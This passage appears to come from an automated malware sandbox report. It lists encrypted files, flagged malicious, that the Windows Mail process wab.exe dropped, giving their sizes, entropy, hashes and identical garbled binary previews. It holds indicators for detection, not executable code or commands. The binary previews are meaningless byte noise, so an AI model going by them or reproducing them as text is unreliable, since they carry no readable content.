                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185442
                                                                                          Entropy (8bit):7.998948239861001
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxO:YzytbGOX6A16mtpmGvFdVT6LELSRDq4e
                                                                                          MD5:450F8530C51F4C24BFFE1A87C50C8DFD
                                                                                          SHA1:E89159E05D81744F9C3940497E03F4276D433375
                                                                                          SHA-256:2F5367ADD971043E602D9F483F272242171E091298E8DFC58ABE92D5A873AE4F
                                                                                          SHA-512:4DC07995A2F484F27BC9BD7441F784DA6A30D88CD1606C968FF2EE6ABF9DDAE4D13A61565849B34EA3CB69DB24CB48093D56022AA64AEFFF51DB4E68D3A6F299
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185442
                                                                                          Entropy (8bit):7.998948239861001
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxO:YzytbGOX6A16mtpmGvFdVT6LELSRDq4e
                                                                                          MD5:450F8530C51F4C24BFFE1A87C50C8DFD
                                                                                          SHA1:E89159E05D81744F9C3940497E03F4276D433375
                                                                                          SHA-256:2F5367ADD971043E602D9F483F272242171E091298E8DFC58ABE92D5A873AE4F
                                                                                          SHA-512:4DC07995A2F484F27BC9BD7441F784DA6A30D88CD1606C968FF2EE6ABF9DDAE4D13A61565849B34EA3CB69DB24CB48093D56022AA64AEFFF51DB4E68D3A6F299
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185442
                                                                                          Entropy (8bit):7.998948239861001
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxO:YzytbGOX6A16mtpmGvFdVT6LELSRDq4e
                                                                                          MD5:450F8530C51F4C24BFFE1A87C50C8DFD
                                                                                          SHA1:E89159E05D81744F9C3940497E03F4276D433375
                                                                                          SHA-256:2F5367ADD971043E602D9F483F272242171E091298E8DFC58ABE92D5A873AE4F
                                                                                          SHA-512:4DC07995A2F484F27BC9BD7441F784DA6A30D88CD1606C968FF2EE6ABF9DDAE4D13A61565849B34EA3CB69DB24CB48093D56022AA64AEFFF51DB4E68D3A6F299
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):186660
                                                                                          Entropy (8bit):7.99903852139626
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxP:YzytbGOX6A16mtpmGvFdVT6LELSRDqwD
                                                                                          MD5:1A7430ED443325DADD6B77854F3FD70C
                                                                                          SHA1:C2611A50E954C9E8443A7C40118FCA97AE621FA5
                                                                                          SHA-256:580724D172A9D9FDD69DDB1E184C3F3101B6AB8C5CC59ACB1821246C2C700B2B
                                                                                          SHA-512:56BA614D1C1E47B8B055FB70001B19A2E6F1C8E6801DAB3CFBC94B048D73AA13B25A8F2C1E9C137BB0D7885E5A94E31C91AD1A6F17D83671E264F2C1B36717C3
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):186963
                                                                                          Entropy (8bit):7.998971711377076
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxr:YzytbGOX6A16mtpmGvFdVT6LELSRDq/C
                                                                                          MD5:7E10DD5FBD70D704C3B5F1E08B1DB795
                                                                                          SHA1:E294EAD29329759C084946BB6A57264B8778E615
                                                                                          SHA-256:39FC51B46A95C0856CE782DF17041953D1627A8A496812554314E58F2E791051
                                                                                          SHA-512:1DDCDBEFE51E20C40718CAA1B6E2B89F1121A954D9EBB4B436FE40D944EFFF09444078B859463C7CDA9A2A82B539EE6762832354AA668B8059A109A8BB20E791
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):186963
                                                                                          Entropy (8bit):7.998971711377076
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxr:YzytbGOX6A16mtpmGvFdVT6LELSRDq/C
                                                                                          MD5:7E10DD5FBD70D704C3B5F1E08B1DB795
                                                                                          SHA1:E294EAD29329759C084946BB6A57264B8778E615
                                                                                          SHA-256:39FC51B46A95C0856CE782DF17041953D1627A8A496812554314E58F2E791051
                                                                                          SHA-512:1DDCDBEFE51E20C40718CAA1B6E2B89F1121A954D9EBB4B436FE40D944EFFF09444078B859463C7CDA9A2A82B539EE6762832354AA668B8059A109A8BB20E791
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):186963
                                                                                          Entropy (8bit):7.998971711377076
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxr:YzytbGOX6A16mtpmGvFdVT6LELSRDq/C
                                                                                          MD5:7E10DD5FBD70D704C3B5F1E08B1DB795
                                                                                          SHA1:E294EAD29329759C084946BB6A57264B8778E615
                                                                                          SHA-256:39FC51B46A95C0856CE782DF17041953D1627A8A496812554314E58F2E791051
                                                                                          SHA-512:1DDCDBEFE51E20C40718CAA1B6E2B89F1121A954D9EBB4B436FE40D944EFFF09444078B859463C7CDA9A2A82B539EE6762832354AA668B8059A109A8BB20E791
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):186963
                                                                                          Entropy (8bit):7.998971711377076
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxr:YzytbGOX6A16mtpmGvFdVT6LELSRDq/C
                                                                                          MD5:7E10DD5FBD70D704C3B5F1E08B1DB795
                                                                                          SHA1:E294EAD29329759C084946BB6A57264B8778E615
                                                                                          SHA-256:39FC51B46A95C0856CE782DF17041953D1627A8A496812554314E58F2E791051
                                                                                          SHA-512:1DDCDBEFE51E20C40718CAA1B6E2B89F1121A954D9EBB4B436FE40D944EFFF09444078B859463C7CDA9A2A82B539EE6762832354AA668B8059A109A8BB20E791
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):186963
                                                                                          Entropy (8bit):7.998971711377076
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxr:YzytbGOX6A16mtpmGvFdVT6LELSRDq/C
                                                                                          MD5:7E10DD5FBD70D704C3B5F1E08B1DB795
                                                                                          SHA1:E294EAD29329759C084946BB6A57264B8778E615
                                                                                          SHA-256:39FC51B46A95C0856CE782DF17041953D1627A8A496812554314E58F2E791051
                                                                                          SHA-512:1DDCDBEFE51E20C40718CAA1B6E2B89F1121A954D9EBB4B436FE40D944EFFF09444078B859463C7CDA9A2A82B539EE6762832354AA668B8059A109A8BB20E791
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):186963
                                                                                          Entropy (8bit):7.998971711377076
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxr:YzytbGOX6A16mtpmGvFdVT6LELSRDq/C
                                                                                          MD5:7E10DD5FBD70D704C3B5F1E08B1DB795
                                                                                          SHA1:E294EAD29329759C084946BB6A57264B8778E615
                                                                                          SHA-256:39FC51B46A95C0856CE782DF17041953D1627A8A496812554314E58F2E791051
                                                                                          SHA-512:1DDCDBEFE51E20C40718CAA1B6E2B89F1121A954D9EBB4B436FE40D944EFFF09444078B859463C7CDA9A2A82B539EE6762832354AA668B8059A109A8BB20E791
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):186663
                                                                                          Entropy (8bit):7.999043718447707
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bx5:YzytbGOX6A16mtpmGvFdVT6LELSRDq7g
                                                                                          MD5:EC1324B676948413F1361141F982164E
                                                                                          SHA1:9ACCC45F3A53F4669DA84CF0A0F2FFB527CDC368
                                                                                          SHA-256:A9A657348B6C28016F59684BA8CB1795DE49475E15FB29AC00BF0A85813FFDFE
                                                                                          SHA-512:9D614F34876686795555E29ABBE998666F760422E6834F88BE8D582CD5EFD016FD1F7F6F6BED31B6A9606206CCE4F1CA2DEF3B011792859540542463AD1988EE
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
